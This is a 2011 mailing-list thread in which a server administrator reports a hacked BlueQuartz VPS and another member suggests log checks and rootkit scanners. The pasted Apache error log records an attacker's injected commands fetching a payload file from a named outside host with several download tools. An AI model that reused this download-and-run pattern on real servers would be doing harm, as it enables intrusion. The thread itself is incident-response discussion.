[BlueOnyx:08820] Re: vps hacked

Steffan general at ziggo.nl
Thu Oct 13 09:04:51 -05 2011 

I have looked in secure
Used last
Nothing
No siteadmin logins

Looks like they find a hole in some side I have no idée



-----Oorspronkelijk bericht-----
Van: blueonyx-bounces at mail.blueonyx.it
[mailto:blueonyx-bounces at mail.blueonyx.it] Namens Mike's List
Verzonden: donderdag 13 oktober 2011 15:29
Aan: BlueOnyx General Mailing List
Onderwerp: [BlueOnyx:08818] Re: vps hacked


Have you look at /var/log/secure?  Use the "last" command to see if any
suspicious login via shell?  (Might have to unzip those wtmp file/s for
older/previous login.  Is there a log for GUI login also that you can
track?

Run rkunter and chkrootkit for rootkit installation?  Install ClamAV,
Sophos, etc. for malware/antivirus scanning?  RPMs for rkhunter and
chkrootkit can be found below, download the appropriate version for your
OS version, then "rpm -ivh <package.rpm>" and run "rkhunter -c" and/or
"chkrootkit" to start scanning.

http://pkgs.repoforge.org/rkhunter/
http://pkgs.repoforge.org/chkrootkit/


Mike


On Thu, 13 Oct 2011, Steffan wrote:

> 
> I still have a client with a BlueQuartz server (vps)
> 
>  
> 
> This morning the virtual server was hacked
> 
> I looked in the logs and found this in /var/log/httpd/error_log
> 
>  
> 
>  
> 
>  
> 
> [Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no acceptable
variant: /usr/sausalito/ui/web/error/fileNotFound.html
> 
> --00:07:40--  http://rapha.altervista.org/prv.txt
> 
>            => `prv.txt'
> 
> Resolving rapha.altervista.org... 46.4.65.68
> 
> Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
> 
> HTTP request sent, awaiting response... 200 OK
> 
> Length: 28,039 (27K) [text/plain]
> 
>  
> 
>     0K .......... .......... .......                         100% 1015.53
KB/s
> 
>  
> 
> 00:07:40 (1015.53 KB/s) - `prv.txt' saved [28039/28039]
> 
>  
> 
> sh: line 1: lwp-downlod: command not found
> 
> sh: line 1: fetch: command not found
> 
> sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
> 
>   % Total    % Received % Xferd  Average Speed   Time    Time     Time 
Current
> 
>                                  Dload  Upload   Total   Spent    Left 
Speed
> 
> ^M 14 28039   14  4097    0     0  98324      0 --:--:-- --:--:-- --:--:--
98324^M100 28039  100 28039    0     0   403k      0 --:--:-- --:--:--
--:--:--  899k
> 
> sh: line 3: prv.txt: command not found
> 
> --00:07:40--  http://rapha.altervista.org/prv.txt
> 
>            => `prv.txt'
> 
> Resolving rapha.altervista.org... 46.4.65.68
> 
> Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
> 
> HTTP request sent, awaiting response... 200 OK
> 
> Length: 28,039 (27K) [text/plain]
> 
>  
> 
>     0K .......... .......... .......                         100% 1020.34
KB/s
> 
>  
> 
> 00:07:40 (1020.34 KB/s) - `prv.txt' saved [28039/28039]
> 
>  
> 
> sh: line 1: lwp-downlod: command not found
> 
> sh: line 1: fetch: command not found
> 
> sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
> 
>   % Total    % Received % Xferd  Average Speed   Time    Time     Time 
Current
> 
>                                  Dload  Upload   Total   Spent    Left 
Speed
> 
> ^M  4 28039    4  1201    0     0  42493      0 --:--:-- --:--:-- --:--:--
42493^M100 28039  100 28039    0     0   507k      0 --:--:-- --:--:--
--:--:-- 1048k
> 
> sh: line 3: prv.txt: command not found
> 
>  
> 
> I don?t see any admin logins
> 
> How can I find out what happened
> I dont see anything weird in the access log or message log
> 
>  
> 
> Thanxs Steffan
> 
> 
>

More information about the Blueonyx mailing list